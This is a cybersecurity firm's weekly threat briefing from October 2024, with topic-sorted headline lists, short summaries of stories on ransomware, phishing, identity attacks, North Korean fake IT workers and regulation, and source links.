Ransomware is driving an increase in emergency patient care (cyberscoop.com)

Ransomware's ripples felt across ERs as care suffers • The Register

Russia recommends prison sentence for REvil hackers | SC Media

Are Leaders Ready to Break the Ransomware Cycle - Security Boulevard

What's behind the 51% drop in ransomware attacks? (securityintelligence.com)

Organisations Paying Fewer Ransoms, Building Resilience: Kaseya | MSSP Alert

Ransomware Victims

How the ransomware attack at Change Healthcare went down: A timeline | TechCrunch

Radisson’s Country Inn and Suites Allegedly Hit by Ransomware | MSSP Alert

Ransomware's ripples felt across ERs as care suffers • The Register

Henry Schein discloses data breach a year after ransomware attack

50,000 Files Exposed in Nidec Ransomware Attack - Infosecurity Magazine (infosecurity-magazine.com)

Ransomware gang stoops to new low, targets prominent nonprofit for disabled people (therecord.media)

Spate of ransomware attacks on German-speaking schools hits another in Switzerland

Rocky Mountain Gastroenterology Reportedly Experiences Triple Cyber Attack, Resulting in Data Breach Affecting Up to 169k | Console and Associates, P.C. - JDSupra

Crypt Ghouls Targets Russian Firms with LockBit 3.0 and Babuk Ransomware Attacks (thehackernews.com)

Phishing & Email Based Attacks

Cyber criminal underground “thriving” as weekly attacks surge by 75% in Q3 2024 | ITPro

Microsoft Named Most Imitated Brand in Phishing Attacks - Infosecurity Magazine (infosecurity-magazine.com)

Evolving cyber criminal tactics targeting SMBs - Help Net Security

Latrodectus Malware Increasingly Used by Cyber Criminals - SecurityWeek

Bumblebee and Latrodectus Malware Return with Sophisticated Phishing Strategies

Top open source email platform hacked to steal user details | TechRadar

Hackers are stepping up ‘qishing’ attacks by hiding malicious QR codes in PDF email attachments | ITPro

AI and deepfakes fuel phishing scams, making detection harder - Help Net Security

Evolving Email Threats and How to Protect Against Them - IT Security Guru

Unknown threat actors exploit Roundcube Webmail flaw in phishing campaign (securityaffairs.com)

Phishing scams and malicious domains take center stage as the US election approaches - Help Net Security

Threat actors increasingly using malicious virtual hard drives in phishing attacks | CSO Online

Phishing Scams & Ransomware: Fortinet's Threat Intelligence Highlights Election Cyber Risks (thefastmode.com)

LinkedIn bots and spear phishers target job seekers | Malwarebytes

75% of US Senate Campaign Websites Fail to Implement DMARC - Infosecurity Magazine

Gophish Framework Used in Phishing Campaigns to Deploy Remote Access Trojans (thehackernews.com)

Why Phishing-Resistant MFA Is No Longer Optional: The Hidden Risks of Legacy MFA

Business Email Compromise (BEC)/Email Account Compromise (EAC)

Evolving cyber criminal tactics targeting SMBs - Help Net Security

Other Social Engineering

Experts warn North Koreans are posing as IT workers in the West

'Pig butchering': How cyber criminals target investors with fake trading apps

LinkedIn bots and spear phishers target job seekers | Malwarebytes

HYPR is latest firm to reveal hiring of fraudulent IT worker overseas | CyberScoop

Fortra Report Reveals Surge In Domain Impersonation, Social Media Attacks, And Dark Web Activity (informationsecuritybuzz.com)

Artificial Intelligence

AI-generated cyber threats have C-suite leaders on edge | Fortune

55% Of Employees Using AI At Work Have No Training On Its Risks (forbes.com)

Hackers are finding new ways to leverage AI - Help Net Security

OpenAI’s voice API can build AI agents for phone scams • The Register

New Cyber Security Warning As 1,000 Elite Hackers Embrace AI

AI and deepfakes fuel phishing scams, making detection harder - Help Net Security

AI tools are being increasingly abused to launch cyber attacks | TechRadar

AI hack: Do not give chatbots your personal data

Cyber Security Teams Largely Ignored in AI Policy Development - Infosecurity Magazine

This new AI jailbreaking technique lets hackers crack models in just three interactions | ITPro

In 2025 Security And Risk Pros Will Brace For Regulations And Resilience (forbes.com)

The rise of the machines and the growing AI identity attack surface | CSO Online

68% of directors don't have a board-approved AI policy - IoD Ireland

AI-Powered Attacks Flood Retail Websites - Infosecurity Magazine

AI honeypot hit 800K times | Cybernews

CIOs under pressure to deliver AI outcomes faster | CIO

2FA/MFA

Poor MFA, identity attacks dominate threat landscape in Q3 2024 | SC Media

Understanding the Importance of MFA: A Comprehensive Guide - Security Boulevard

QR codes are being hijacked to bypass MFA protections | TechRadar

Why Phishing-Resistant MFA Is No Longer Optional: The Hidden Risks of Legacy MFA

Malware

HM Surf macOS vuln potentially exploited by Adloader malware • The Register

Latrodectus Malware Increasingly Used by Cyber Criminals - SecurityWeek

Bumblebee and Latrodectus Malware Return with Sophisticated Phishing Strategies

Over 6,000 WordPress hacked to install plugins pushing infostealers

New Malware WarmCookie Targets Users with Malicious Links - Infosecurity Magazine (infosecurity-magazine.com)

Over 10M+ Personal And Corporate Devices Infected By Information Stealers (cybersecuritynews.com)

Modern Malware Is Stealthier Than Older Attacks: This Is How It Stays Hidden

Netskope Reports Possible Bumblebee Loader Resurgence - Infosecurity Magazine

Sneaky Ghostpulse malware loader hides inside PNG pixels • The Register

Hackers infect thousands of WordPress sites with malware plugins | PCWorld

New Grandoreiro Banking Malware Variants Emerge with Advanced Tactics to Evade Detection (thehackernews.com)

Perfctl malware strikes again via Docker Remote API servers • The Register

'Prometei' Botnet Spreads its Cryptojacker Worldwide (darkreading.com)

Gophish Framework Used in Phishing Campaigns to Deploy Remote Access Trojans (thehackernews.com)

Bots/Botnets

Anti-Bot Services Help Cyber Crooks Bypass Google 'Red Page' (darkreading.com)

'Prometei' Botnet Spreads its Cryptojacker Worldwide (darkreading.com)

Mobile

Google Warns of Samsung Zero-Day Exploited in the Wild - SecurityWeek

Why you should power off your phone at least once a week - according to the NSA | ZDNET

Millions of mobile app users at risk from hardcoded creds • The Register

Location tracking of phones is out of control. Here’s how to fight back. - Ars Technica

Denial of Service/DoS/DDoS

How to detect DDoS attacks | TechTarget

Military Exercises Trigger Russian DDoS Attacks on Japan (govinfosecurity.com)

Russia-Linked Hacktivists Attack Japan's Govt, Ports (darkreading.com)

Data Breaches/Leaks

UnitedHealth says Change Healthcare hack affects over 100 million, the largest-ever US healthcare data breach | TechCrunch

Internet Archive Breached Again, Hackers Exploited Unrotated API Tokens (cybersecuritynews.com)

Cisco Confirms Security Incident After Hacker Offers to Sell Data - SecurityWeek

Insurance admin Landmark says data breach impacts 800,000 people

Cisco takes DevHub portal offline after hacker publishes stolen data (bleepingcomputer.com)

Henry Schein discloses data breach a year after ransomware attack

Millions affected in major health data breach caused by a missing password | TechRadar

Data Breach Impacts Insurer Johnson and Johnson | MSSP Alert

Omni Family Health Data Breach Impacts 470,000 Individuals - SecurityWeek

Rocky Mountain Gastroenterology Reportedly Experiences Triple Cyber Attack, Resulting in Data Breach Affecting Up to 169k | Console and Associates, P.C. - JDSupra

Dance Apparel Company Sued After 65,000 Customers' Data Exposed

Organised Crime & Criminal Actors

Cyber criminal underground “thriving” as weekly attacks surge by 75% in Q3 2024 | ITPro

The evolution of cyber crime: How ransomware became the weapon of choice | TechRadar

'Pig butchering': How cyber criminals target investors with fake trading apps

UK Weighs Review of Computer Misuse Act to Combat Cyber Crime - Infosecurity Magazine (infosecurity-magazine.com)

Russia recommends prison sentence for REvil hackers | SC Media

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Cyber Criminals Exploiting Docker API Servers for SRBMiner Crypto Mining Attacks

Chinese trader laundered more than $17M for Lazarus Group in 25 hacks (cointelegraph.com)

The Lazarus APT Strikes Again: New Zero-Day Exploit Targets Investors Through DeFi Games (informationsecuritybuzz.com)

'Prometei' Botnet Spreads its Cryptojacker Worldwide (darkreading.com)

Fraudulent DeFi game leveraged in new crypto investor-targeted Lazarus attack | SC Media

Insider Risk and Insider Threats

The Single Biggest Vulnerability in Your Cyber Security Is You : ScienceAlert

The Enemy Within: Navigating the Evolving Landscape of (globenewswire.com)

Fortinet report: 70% of staff lack cyber security awareness

Human error is the weakest link in the cyber security chain. Here are 3 ways to fix it

Insurance

Cyber incidents surge, damaging brand trust and business relationships – Hiscox | Insurance Business America

Gallagher leader warns cyber is still an emerging risk | Insurance Times

Gallagher Re study links cyber security gaps to higher insurance claims | Insurance Business America (insurancebusinessmag.com)

Facing the uncertainty of cyber insurance claims - Help Net Security

The future of cyber insurance: Meeting the demand for non-attack coverage - Help Net Security

Supply Chain and Third Parties

Can the cyber security industry stop history repeating? | TechRadar

Cloud/SaaS

Think You're Secure? 49% of Enterprises Underestimate SaaS Risks

Microsoft lost some customers' cloud security logs - Help Net Security

Researchers Discover Severe Security Flaws in Major E2EE Cloud Storage Providers (thehackernews.com)

Half of Organisations Have Unmanaged Long-Lived Cloud Credentials - Infosecurity Magazine

Unmanaged Cloud Credentials Pose Risk to Half of Orgs (darkreading.com)

Top open source email platform hacked to steal user details | TechRadar

Navigating the Complexities & Security Risks of Multi-cloud Management

Evolving cloud threats: Insights and recommendations - Help Net Security

Grip Security Releases 2025 SaaS Security Risks Report

Microsoft creates fake Azure tenants to pull phishers into honeypots (bleepingcomputer.com)

Balancing Clients' Security and Functionality in the Cloud - Infosecurity Magazine (infosecurity-magazine.com)

Outages

Can the cyber security industry stop history repeating? | TechRadar

Identity and Access Management

Poor MFA, identity attacks dominate threat landscape in Q3 2024 | SC Media

A Comprehensive Guide to Finding Service Accounts in Active Directory

What is step-up authentication & how can it help prevent financial fraud? (businesscloud.co.uk)

Encryption

What NIST's post-quantum cryptography standards mean for data security

Why experts are warning businesses to prepare for quantum now – or face critical cyber risks when it arrives | ITPro

How to fend off a quantum computer attack - Help Net Security

Linux and Open Source

Intel, AMD CPUs on Linux impacted by newly disclosed Spectre bypass (bleepingcomputer.com)

Why remove Russian maintainers of Linux kernel? Here's what Torvalds says | ZDNET

Passwords, Credential Stuffing & Brute Force Attacks

Half of Organisations Have Unmanaged Long-Lived Cloud Credentials - Infosecurity Magazine

Unmanaged Cloud Credentials Pose Risk to Half of Orgs (darkreading.com)

Top open source email platform hacked to steal user details | TechRadar

Millions of mobile app users at risk from hardcoded creds • The Register

The Key Components For a Secure Password Policy - Infosecurity Magazine (infosecurity-magazine.com)

Cisco fixes bug under exploit in brute-force attacks • The Register

Millions affected in major health data breach caused by a missing password | TechRadar

Social Media

Instagram Rolls Out New Sextortion Protection Measures - Infosecurity Magazine (infosecurity-magazine.com)

LinkedIn bots and spear phishers target job seekers | Malwarebytes

Fortra Report Reveals Surge In Domain Impersonation, Social Media Attacks, And Dark Web Activity (informationsecuritybuzz.com)

Irish Watchdog Imposes Record €310 Million Fine on LinkedIn for GDPR Violations

What to Know About Meta’s Facial Recognition Plans | TIME

Training, Education and Awareness

55% Of Employees Using AI At Work Have No Training On Its Risks (forbes.com)

Fortinet report: 70% of staff lack cyber security awareness

Employees lack fundamental security awareness (betanews.com)

Regulations, Fines and Legislation

UK Weighs Review of Computer Misuse Act to Combat Cyber Crime - Infosecurity Magazine (infosecurity-magazine.com)

EU’s NIS2 Directive for cyber security resilience enters full enforcement | CSO Online

The worldwide focus on operational resilience in financial services: what firms and service providers need to know, Claire Harrop, Matthew O'Callaghan, Nariné Atamian, Daphne van der Houwen, Christopher Bernard

How can businesses comply with EU’s new cyber law?

NIS2’s cyber security value spreads beyond its expanded scope | CSO Online

SEC.gov | SEC Charges Four Companies With Misleading Cyber Disclosures

EU’s NIS 2 enters into force: compliance is now mandatory

Forthcoming UK Cyber Security and Resilience Bill to Boost the UK’s Cyber Defences | Alston & Bird - JDSupra

SEC charges tech companies for downplaying SolarWinds breaches (bleepingcomputer.com)

SEC hits security companies with massive fines for misdirection over SolarWinds Orion hack | Cybernews

Irish Watchdog Imposes Record €310 Million Fine on LinkedIn for GDPR Violations

SEC is Not Accepting Half-Truths - Security Boulevard

Client Alert: Key Takeaways from Recent SEC Cyber Security Enforcement Actions | Jenner & Block - JDSupra

UK Government Introduces New Data Governance Legislation - Infosecurity Magazine

SEC SolarWinds Fines a Warning to Organisations, MSSPs | MSSP Alert

Cyber Incident Response Checklist for SEC Compliance | Troutman Pepper - JDSupra

The struggle for software liability: Inside a ‘very, very, very hard problem’ (therecord.media)

In 2025 Security And Risk Pros Will Brace For Regulations And Resilience (forbes.com)

US Finally Restricts Sale Of Location Data To Foreign Adversaries, But We’re Still Too Corrupt To Pass A Basic Internet-Era Privacy Law | Techdirt

OODA Loop - Board Members Should Review Cyber Risk Disclosure Procedures Following SEC Enforcement

Penn State Settles for $1.25M Over Failure to Comply With DoD, NASA Cyber Security Requirements - SecurityWeek

Models, Frameworks and Standards

EU’s NIS2 Directive for cyber security resilience enters full enforcement | CSO Online

The worldwide focus on operational resilience in financial services: what firms and service providers need to know, Claire Harrop, Matthew O'Callaghan, Nariné Atamian, Daphne van der Houwen, Christopher Bernard

How can businesses comply with EU’s new cyber law?

NIS2’s cyber security value spreads beyond its expanded scope | CSO Online

EU’s NIS 2 enters into force: compliance is now mandatory

EU Adopts Cyber Resilience Act For Connected Devices

What NIST's post-quantum cryptography standards mean for data security

Government Marks 10 Years of Cyber Essentials, Calls for More Adoption | SC Media UK (scmagazineuk.com)

What is DORA – and how can Proton help with compliance? | Proton

Data Protection

Irish Watchdog Imposes Record €310 Million Fine on LinkedIn for GDPR Violations

Careers, Working in Cyber and Information Security

What even is a ‘cyber security profession’?

CISOs Concerned Over Growing Demands of Role - Security Boulevard

Enterprises are struggling to fill senior cyber security roles — and it's causing staff burnout to skyrocket | ITPro

68% of cyber security professionals in Europe face burnout, driven by high pressure and insufficient staffing - Financial News

Cyber security leaders struggle with job stress (devx.com)

Joe Sullivan: CEOs must be held accountable for security too | TechTarget

CISOs respond: 49% of CISOs plan to leave role without industry action | Security Magazine

Making Cyber Security Accessible For Neurodiverse Talent (darkreading.com)

What's more important when hiring for cyber security roles? - Help Net Security

What I’ve learned in my first 7-ish years in cyber security

Law Enforcement Action and Take Downs

Bumblebee malware returns after recent law enforcement disruption (bleepingcomputer.com)

Misinformation, Disinformation and Propaganda

Governments fear election interference, but it’s an enterprise cyber security problem too | CSO Online

Are tech billionaires hijacking our future? This Nobel laureate warns of Big Tech's stranglehold on AI and democracy | Fortune Europe

Phishing scams and malicious domains take center stage as the US election approaches - Help Net Security

Phishing Scams & Ransomware: Fortinet's Threat Intelligence Highlights Election Cyber Risks (thefastmode.com)

Russian Trolls Sow US Election Chaos (darkreading.com)


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

CISA Proposes New Security Measures To Safeguard Sensitive Data From Adversary States (informationsecuritybuzz.com)

CISA proposes new security requirements for businesses exposed to cyber espionage | CSO Online

Nation State Actors

China

Cameron Calls for Tech Engagement with China Despite Cyber Threats - Infosecurity Magazine (infosecurity-magazine.com)

Chinese Nation-State Hackers APT41 Hit Gambling Sector for Financial Gain

Gambling sector subjected to APT41 intrusions | SC Media

Russia

Russian Intelligence Ramps Up Global Cyber Campaign, Says Western Intelligence

Former UK special forces director warns of Russian cyber-security threat - Jersey Evening Post

Russian Trolls Sow US Election Chaos (darkreading.com)

Military Exercises Trigger Russian DDoS Attacks on Japan (govinfosecurity.com)

How Russia’s Spies Hacked the Entire Nation of Georgia – BNN Bloomberg

Russian Strategic Information Attack for Catastrophic Effect

Russia-Linked Hacktivists Attack Japan's Govt, Ports (darkreading.com)

Why remove Russian maintainers of Linux kernel? Here's what Torvalds says | ZDNET

Crypt Ghouls Targets Russian Firms with LockBit 3.0 and Babuk Ransomware Attacks (thehackernews.com)

Russian Foreign Ministry reports 'large-scale' cyber attack on its resources

Russia recommends prison sentence for REvil hackers | SC Media

Iran

Iranian hackers act as brokers selling critical infrastructure access (bleepingcomputer.com)

North Korea

Experts warn North Koreans are posing as IT workers in the West

Lazarus Group Exploits Google Chrome Vulnerability to Control Infected Devices

Chinese trader laundered more than $17M for Lazarus Group in 25 hacks (cointelegraph.com)

The Lazarus APT Strikes Again: New Zero-Day Exploit Targets Investors Through DeFi Games (informationsecuritybuzz.com)

HYPR is latest firm to reveal hiring of fraudulent IT worker overseas | CyberScoop

Cyber firm launches free tool to weed out hackers in hiring process

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Sidewinder APT Deploying Expanded Attacks | MSSP Alert

Think Tanks Urge Action to Curb Misuse of Spyware and Hack-for-Hire - Infosecurity Magazine


Tools and Controls

Understanding the Importance of MFA: A Comprehensive Guide - Security Boulevard

Time to Get Strict With DMARC (darkreading.com)

55% Of Employees Using AI At Work Have No Training On Its Risks (forbes.com)

Microsoft lost some customers' cloud security logs - Help Net Security

A Business Continuity Cheat Sheet - Compare the Cloud

Can the cyber security industry stop history repeating? | TechRadar

A Comprehensive Guide to Finding Service Accounts in Active Directory

Call for cyber security sea change as world looks to meet rising threats

Fortinet report: 70% of staff lack cyber security awareness

Cyber resilience vs. cyber security: Which is more critical? (betanews.com)

CISOs: Throwing Cash at Tools Isn't Helping Detect Breaches (darkreading.com)

Multi-layered security is the key to keeping data safe – here’s why | ITPro

Effective strategies for measuring and testing cyber resilience - Help Net Security

New Research Underscores the Growing Security Risk Due to Hybrid Work Environments | Business Wire

Cyber insurers could cut loss ratios by 16% by excluding high-risk entities: Gallagher Re - Reinsurance News

SQL Injection Attacks: Cyber Security Expert Reveals How Businesses Can Mitigate the Risks Involved - Financial News (financial-news.co.uk)

Negating AI cyber attacks with defence in depth | TechRadar

Threat intelligence vs. threat hunting: Better together | TechTarget

API Vulnerabilities Jump 21% in Third Quarter - Security Boulevard

In 2025 Security And Risk Pros Will Brace For Regulations And Resilience (forbes.com)

68% of directors don't have a board-approved AI policy - IoD Ireland

Why Phishing-Resistant MFA Is No Longer Optional: The Hidden Risks of Legacy MFA

AV-Comparatives Releases Latest Business Cyber Security Test Results: Top-Performing Products for Protection and Performance Certified

Achieving peak cyber resilience - Help Net Security

Cyber security incident response: Is your business prepared? | Proton

Microsoft creates fake Azure tenants to pull phishers into honeypots (bleepingcomputer.com)

Unclear pricing for GRC tools creates market confusion - Help Net Security

Five Ways To Improve Your Security Posture, Fast

Enhancing Cyber Security Post-Breach: A Comprehensive Guide - Security Boulevard

What is Third-Party Risk Monitoring in Cyber Security? | UpGuard

Vulnerability Management

Threat actors exploit zero days within 5 days, says Google's Mandiant | SC Media (scworld.com)

What is Vulnerability Management? Compliance, Challenges, & Solutions - Security Boulevard

Threat Actors Are Exploiting Vulnerabilities Faster Than Ever (techrepublic.com)

Vulnerabilities

Intel, AMD CPUs on Linux impacted by newly disclosed Spectre bypass (bleepingcomputer.com)

Microsoft launches Edge 130 with lots of security patches and feature changes - gHacks Tech News

MacOS Safari Exploit Exposes Camera, Mic, Browser Data (darkreading.com)

Researchers Discover Severe Security Flaws in Major E2EE Cloud Storage Providers (thehackernews.com)

Lazarus Group Exploits Google Chrome Vulnerability to Control Infected Devices

Atlassian Patches Vulnerabilities in Bitbucket, Confluence, Jira - SecurityWeek

Fortinet releases patches for undisclosed critical FortiManager vulnerability - Help Net Security

HM Surf macOS vuln potentially exploited by Adloader malware • The Register

Google Warns of Samsung Zero-Day Exploited in the Wild - SecurityWeek

VMware fixes critical vCenter Server RCE bug - again! (CVE-2024-38812) - Help Net Security

Patch your Bitdefender and Trend Micro security software immediately to stay safe from these threats | TechRadar

CISA confirms Veeam vulnerability is being used in ransomware attacks (therecord.media)

Unknown threat actors exploit Roundcube Webmail flaw in phishing campaign (securityaffairs.com)

Samsung phone users exposed to EoP attacks, Google warns • The Register

High-risk vulnerability affecting UniFi Network Server | Cybernews

CISA Warns Recent Microsoft SharePoint RCE Flaw Exploited in Attacks - SecurityWeek

Microsoft SharePoint RCE under active exploit • The Register

Cisco fixed tens of vulnerabilities, including an actively exploited one

Cisco fixes VPN DoS flaw discovered in password spray attacks

Hackers infect thousands of WordPress sites with malware plugins | PCWorld

Nvidia Patches High-Severity Flaws in Windows, Linux Graphics Drivers - SecurityWeek

Critical Grafana Vulnerability Could Allow RCE | MSSP Alert


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Black Arrow Admin

Black Arrow Cyber Threat Briefing 18 October 2024

Black Arrow Cyber Threat Intelligence Briefing 18 October 2024:

- 70% of Senior Executives Targeted by Cyber Attack in Past 18 Months, New Study Reveals

- Defenders Must Adapt to Shrinking Exploitation Timelines

- Supply Chain Vulnerabilities are Facilitating a Surge in Ransomware

- Limited Visibility and Tool Proliferation Prevent CISOs from Detecting Breaches

- Organisations Need to Better Prepare Swiftly from Cyber Attacks, New NCSC Head Warns

- Microsoft Logs 600 million Identity Attacks Per Day as Nation-States Team Up with Cyber Criminals for Attacks

- Over 90% of Phishing Campaigns Lead Victims to Malware

- Here’s How Attackers Are Getting Around Phishing Defences

- Firm Hacked After Accidentally Hiring North Korean Cyber Criminal

- Rampant Ransom Payments Highlight Need for Urgent Action on Cyber Resiliency

- October is Cyber Security Awareness Month – It’s a Good Time to Update Your Training Programme

- Phishing Tactics: The Top Attacks Trends in 2024

Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

70% of Senior Executives Targeted by Cyber Attack in Past 18 Months, New Study Reveals

A recent report from GetApp highlights that 70% of senior executives have been targeted by cyber attacks in the last 18 months, with AI-driven deepfakes contributing to 22% of attacks. 42% of companies overlook the risks of unsecured communication channels, and 41% fail to regularly update systems. Additionally, 28% of organisations globally do not provide specialised cyber security training for executives, leaving businesses vulnerable to evolving threats.

Defenders Must Adapt to Shrinking Exploitation Timelines

A Mandiant report reveals that the time for attackers to exploit vulnerabilities has dropped sharply to just five days in 2023, down from 32 days in 2022. Zero-day vulnerabilities, which are unknown to vendors, have been favoured over publicly known (n-day) flaws, accounting for 70% of first exploits. Despite media attention, only a portion of vulnerabilities are actively exploited. The findings emphasise the importance of rapid patching and segmented network architectures to reduce risk, as threat actors increasingly exploit vulnerabilities across diverse technologies. Effective prioritisation of patching is now more critical than ever.

Supply Chain Vulnerabilities are Facilitating a Surge in Ransomware

A new report highlights the rising threat of ransomware attacks stemming from software supply chain vulnerabilities, with 62% of small and medium-sized businesses impacted. The findings reveal that 91% of businesses are concerned about ransomware affecting their downstream partners, with nearly half considering changing vendors. The role of AI in cyber attacks is also increasing, with 55% of businesses feeling more at risk due to AI-enhanced threats. Despite the challenges, 97% of those affected managed to restore their data, though 46% had to pay a ransom, with 31% paying over $1 million.

Limited Visibility and Tool Proliferation Prevent CISOs from Detecting Breaches

Despite global security spending set to reach $215 billion in 2024, 44% of CISOs reported failing to detect data breaches over the past year. A key issue is limited visibility, with 70% acknowledging their tools fall short in identifying breaches across hybrid cloud infrastructure. Gaining full visibility into encrypted and lateral traffic is critical, as 93% of malware hides there. CISOs are also overwhelmed by tool proliferation, with 60% prioritising tool consolidation. Concerns around AI-driven cyber attacks are rising, and 46% plan to implement AI to address visibility gaps and improve detection capabilities.

Organisations Need to Better Prepare to Recover Swiftly from Cyber Attacks, New NCSC Head Warns

The new head of the UK’s National Cyber Security Centre, Dr Richard Horne, has warned of escalating cyber threats, and the importance of preparing organisations to recover swiftly from cyber attacks. In 2024 alone, the NCSC responded to 50% more major incidents compared to the previous year, with severe attacks tripling. This rise in threats is driven by the expanding cyber crime marketplace, lowering the barriers for attackers. Horne stressed the need for global collaboration and for security to be embedded in technology from the start.

Microsoft Logs 600 million Identity Attacks Per Day as Nation-States Team Up with Cyber Criminals for Attacks

Microsoft’s 2024 Digital Defence Report reveals a significant rise in identity-based cyber attacks, tracking 600 million attacks per day over the fiscal year. Despite 41% of enterprises adopting multi-factor authentication (MFA), attackers bypass MFA through infrastructure vulnerabilities. Password attacks, such as phishing and brute force methods, still account for over 99% of these incidents. Although attempted ransomware attacks increased 2.75 times, attacks that reached the data encryption stage fell threefold. Notably, collaboration between state-backed actors and cyber criminals is growing, complicating attack attribution, while AI and passwordless authentication are highlighted as essential for future protection.

Over 90% of Phishing Campaigns Lead Victims to Malware

A recent Comcast Business report highlights phishing as the top cyber security threat in 2023, with over 2.6 billion interactions detected. More than 90% of these phishing attempts aimed to direct victims to sites hosting malware, emphasising the need for stronger anti-phishing measures and staff education. Remote services were the primary method for lateral movement, with over 409 million events detected. The report recommends adopting tools like endpoint detection and response (EDR) and managed detection and response (MDR) to help IT teams detect and respond to early-stage threats through real-time network monitoring.

Here’s How Attackers Are Getting Around Phishing Defences

Email security provider Egress' latest report reveals that cyber attackers are bypassing phishing defences by manipulating natural language processing (NLP) technologies used in email filters. They achieve this by inserting benign text, links, and other obfuscation techniques, allowing malicious emails to pass through undetected. Notably, 78% of malicious emails incorporate multiple evasion tactics. Attackers exploit weaknesses in email security systems, including slow processing times that may cause incomplete scans. This trend is concerning, as phishing remains a significant threat, contributing to 31% of all security incidents according to Verizon’s 2024 breach report.

Firm Hacked After Accidentally Hiring North Korean Cyber Criminal

A company was hacked after unknowingly hiring a North Korean cyber criminal as a remote IT worker. The individual, who falsified employment history and personal details, gained access to the company’s network, stole sensitive data, and later demanded a ransom in cryptocurrency. This incident highlights an increasing threat of North Korean workers infiltrating Western firms to fund their regime, with many cases emerging since 2022. While most of these workers are after steady income, this case marks a significant shift towards data theft and extortion from within company defences.

Rampant Ransom Payments Highlight Need for Urgent Action on Cyber Resiliency

According to the Global Cyber Resilience Report 2024, 69% of organisations have paid ransoms this year, despite 77% having a 'do not pay' policy. Only 2% of firms can recover data within 24 hours, despite 98% setting that as their target. This highlights a major gap between perceived and actual cyber resilience. Organisations are unprepared for modern threats, with fewer than half implementing essential security measures like multi-factor authentication. To reduce risks, businesses must adopt modern data security practices, engage in realistic threat simulations, and invest in automated recovery systems to mitigate the growing threat of AI-driven cyber attacks.

October is Cyber Security Awareness Month – It’s a Good Time to Update Your Training Programme

October marks the 21st annual Cyber Security Awareness Month, highlighting the importance of user awareness in defending against cyber attacks. The US Cyber Security and Infrastructure Security Agency (CISA) reports that 90% of successful cyber attacks start with phishing, and Verizon notes that human factors are involved in 68% of breaches. This underscores the need for continuous training across all levels of an organisation. Key actions include using strong passwords, enabling multi-factor authentication, and maintaining up-to-date systems. It’s a good time to review or implement training programmes, ensuring they meet current standards and promote security awareness both at work and home.

Phishing Tactics: The Top Attacks Trends in 2024

Phishing attacks have evolved beyond email, with AI enabling more personalised and sophisticated tactics, such as voice cloning and deepfakes. Attackers increasingly combine phishing with other cyber attacks, like ransomware, to compromise entire networks. This can lead to data breaches, financial losses, and legal consequences under regulations like GDPR. Organisations must adopt a multi-layered defence strategy, combining employee training, multi-factor authentication, and advanced filtering tools. Regular incident response planning is also crucial to minimise the impact of phishing attacks, as techniques continue to grow more complex and harder to detect.

Sources:

https://www.proactiveinvestors.com.au/companies/news/1058404/70-of-senior-executives-targeted-by-cyberattack-in-past-18-months-new-study-reveals-1058404.html

https://www.helpnetsecurity.com/2024/10/16/time-to-exploit-vulnerabilities-2023/

https://www.techradar.com/pro/supply-chain-vulnerabilities-are-facilitating-a-surge-in-ransomware

https://www.helpnetsecurity.com/2024/10/18/cisos-security-tools/

https://www.infosecurity-magazine.com/news/cyber-threats-defend-ncsc-head/

https://www.itpro.com/security/cyber-attacks/microsoft-logs-600-million-identity-attacks-per-day-as-threat-actors-collaborate-more

https://www.securitymagazine.com/articles/101115-over-90-of-phishing-campaigns-lead-victims-to-malware

https://cyberscoop.com/email-natural-language-obfuscation-phishing-egress/

https://www.bbc.co.uk/news/articles/ce8vedz4yk7o

https://www.techradar.com/pro/rampant-ransom-payments-highlight-need-for-urgent-action-on-cyber-resiliency

https://www.jdsupra.com/legalnews/october-is-cybersecurity-awareness-5531410/

https://www.itpro.com/security/cyber-attacks/phishing-tactics-the-top-attacks-trends-in-year


Governance, Risk and Compliance

Gap Between Cyber Threats And Defences ‘Widening’, Cyber Security Chief Warns - PM Today

UK Reports 50% Spike in 'Nationally Significant' Incidents (inforisktoday.com)

'Nationally significant' cyber attacks are surging, warns the UK's new cyber chief (therecord.media)

Cyber Threats Escalating Beyond Ability to Defend, New NCSC Head Warns - Infosecurity Magazine (infosecurity-magazine.com)

Despite massive security spending, 44% of CISOs fail to detect breaches - Help Net Security

Cyber crime's constant rise is becoming everyone's problem - Help Net Security

The Cyber Security Burnout Crisis Is Reaching The Breaking Point (forbes.com)

A quarter of cyber security leaders are ready to quit (betanews.com)

Human Resources’ Role in Data Privacy and Cyber Security, Part II: Assessing Five Key Areas of Risk | Ogletree, Deakins, Nash, Smoak & Stewart, P.C. - JDSupra

Most businesses “overconfident and underprepared” for 2025 cyber threats – PCR (pcr-online.biz)

Why Cyber Security’s Core Focus Should Be Defending Data (govinfosecurity.com)

Cyber security compliance: the heavy burden of regulations on IT leaders - Raconteur

Return on cyber investment | Professional Security Magazine

What Cyber Security Leaders Can Learn From Golf (darkreading.com)

Cyber Security Awareness Month: How CISOs can engage, educate, and empower - Security Boulevard

CISOs' Privacy Responsibilities Keep Growing (darkreading.com)

What Is the ‘Most Pressing Concern’ for Cyber Professionals? (techrepublic.com)

While Cyber Attacks Are Inevitable, Resilience Is Vital (automation.com)

Helping Your Team Cope With the Stress of a Cyber Incident (inforisktoday.com)


Threats

Ransomware, Extortion and Destructive Attacks

